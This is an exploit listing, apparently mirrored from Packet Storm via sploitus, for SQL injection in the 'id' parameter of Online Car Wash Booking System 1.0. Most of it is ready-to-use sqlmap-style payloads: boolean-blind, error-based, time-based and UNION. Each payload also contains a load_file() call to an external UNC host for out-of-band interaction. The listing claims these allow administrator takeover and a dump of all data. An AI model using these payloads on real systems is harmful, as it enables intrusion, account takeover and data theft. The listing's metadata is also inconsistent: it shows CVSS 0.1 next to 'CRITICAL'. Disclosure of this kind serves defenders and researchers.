Exploit for Online Car Wash Booking System 1.0 SQL Injection

Name: Exploit for Online Car Wash Booking System 1.0 SQL Injection
Rating: 5 (210 reviews)
2022-04-14 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:166724
## Title: Online Car Wash Booking System v1.0 Multiple SQLi  
## Author: nu11secur1ty  
## Date: 04.14.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Car-Wash-Booking  
  
## Description:  
The `id` parameter from `Master.php` app appears to be vulnerable to  
multiple SQL injection attacks.  
The attacker can take administrator account control and also of all  
accounts on this system, also the malicious user can download all  
information about this system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
  
---  
Parameter: id (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: id=2'+(select  
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''  
OR NOT 6009=6009-- JZLD  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: id=2'+(select  
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''  
OR (SELECT 6485 FROM(SELECT COUNT(*),CONCAT(0x7178767871,(SELECT  
(ELT(6485=6485,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pulo  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=2'+(select  
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''  
AND (SELECT 4435 FROM (SELECT(SLEEP(5)))atck)-- TPWe  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 2 columns  
Payload: id=2'+(select  
load_file('\\\\v1xg2dpkjsjjwr4viy58pn0dl4rxfpfd6gu8hy5n.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html.net\\bgm'))+''  
UNION ALL SELECT  
NULL,CONCAT(0x7178767871,0x685a6a63457747786c695058795575724b664e564a5764425a61614f776b48765949654350547a73,0x7178627871),NULL--  
-  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Car-Wash-Booking)  
  
## Proof and Exploit:  
[href](https://streamable.com/w4t6rk)